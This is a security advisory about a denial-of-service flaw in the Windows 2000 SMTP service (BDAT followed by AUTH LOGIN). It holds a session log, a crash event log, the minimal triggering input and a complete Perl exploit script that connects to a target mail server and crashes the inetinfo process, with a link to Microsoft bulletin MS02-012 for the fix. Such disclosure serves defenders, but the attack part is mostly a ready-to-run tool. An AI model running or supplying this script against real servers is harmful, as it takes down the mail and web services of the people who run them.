|
COMMAND windows 2000 smtp DoS SYSTEMS AFFECTED Windows 2000 SP1, SP2 PROBLEM H D Moore [http://www.digitaloffense.net] posted : I discovered a way to crash the Win2K smtp service via the BDAT command, causing inetinfo to die with an access violation. ... Here is a brief session log showing the bug: --- Trying 192.168.0.58... Connected to 192.168.0.58. Escape character is \'^]\'. 220 shattered Microsoft ESMTP MAIL Service, Version: 5.0.2195.3779 ready at Mon, 12 Nov 2001 23:33:28 -0600 HELO BISH 250 shattered Hello [192.168.0.169] MAIL FROM: ERUSOLCSIDLLUF 250 2.1.0 ERUSOLCSIDLLUF@shattered....Sender OK RCPT TO: PLUCYLLIS 250 2.1.5 PLUCYLLIS@shattered BDAT 7 LETRAC AUTH LOGIN 250 CHUNK received OK, 7 Octets 334 VXNlcm5hbWU6 Tm90IGFub3RoZXIgbm90Y2ggb24gY3VscCdzIGJlZHBvc3Q= 334 UGFzc3dvcmQ6 WW91IGNhbiBnbyBhaGVhZCBhbmQgY3Jhc2ggbm93Li4u 501 5.7.3 Cannot decode password 500 5.3.3 Unrecognized command <session hangs here> ^] telnet> quit Connection closed. hdm@sliver:~ > --- And here is the event log entry: Event Type: Information Event Source: Application Popup Event Category: None Event ID: 26 User: N/A Computer: SHATTERED Description: Application popup: inetinfo.exe - Application Error : The instruction at \"0x67849cce\" referenced memory at \"0x7fb0f000\". The memory could not be \"read\". Click on OK to terminate the program Click on CANCEL to debug the program --- Basicly, placing AUTH LOGIN after the bytes of a BDAT command, then hitting enter a few times crashes the service. The user/pass was not needed and the BDAT command can be used with only 1 byte if so wished. For instance, the following would work: BDAT 1<cr> XAUTH LOGIN<cr> (output from auth login) <cr> <cr> Exploit : ======= #!/usr/bin/perl -w ################## # # # URL: http://www.digitaloffense.net/ # EMAIL: hdm@digitaloffense.net # USAGE: ./mssmtp_dos.pl <target ip> # # Summary: # # The Microsoft Windows 2000 Internet Mail Service is vulnerable to a # Denial of Service attack through the BDAT command. If exploited, this # vulnerability will cause any and all services running under IIS (the # inetinfo.exe process) to become unavailable. # # # Solution: # # http://www.microsoft.com/technet/security/bulletin/MS02-012.asp # use IO::Socket; $target = shift() || \"127.0.0.1\"; my $port = 25; my $rcpt = \"Administrator\"; my $from = \"crash\\@burn.com\"; my $sock = IO::Socket::INET->new ( PeerAddr => $target, PeerPort => $port, Proto => \'tcp\' ) || die \"could not connect: $!\"; my $banner = <$sock>; if ($banner !~ /^2.*/) { print STDERR \"Error: invalid server response \'$banner\'.\\n\"; exit(1); } print $sock \"HELO $target\\r\\n\"; $resp = <$sock>; print $sock \"MAIL FROM: $from\\r\\n\"; $resp = <$sock>; print $sock \"RCPT TO: $rcpt\\r\\n\"; $resp = <$sock>; print $sock \"BDAT 4\\r\\n\"; print $sock \"b00mAUTH LOGIN\\r\\n\"; $resp = <$sock>; print $sock \"\\r\\n\"; print $sock \"\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\"; close($sock); SOLUTION http://www.microsoft.com/technet/security/bulletin/MS02-012.asp